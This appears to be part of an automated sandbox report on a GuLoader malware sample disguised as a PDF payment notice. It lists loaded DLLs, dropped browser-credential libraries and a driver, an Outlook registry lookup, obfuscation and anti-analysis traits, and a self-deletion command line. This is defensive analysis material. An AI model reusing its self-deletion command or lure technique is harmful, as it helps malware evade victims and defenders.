Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: crtdll.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Payment Advice Note_Pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.1305639727.00000000077F5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Binary contains a suspicious time stamp
Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr Static PE information: 0xE0D5091C [Wed Jul 13 01:51:24 2089 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
PE file contains sections with non-standard names
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API/Special instruction interceptor: Address: 7E6848C
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API/Special instruction interceptor: Address: 46E848C
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
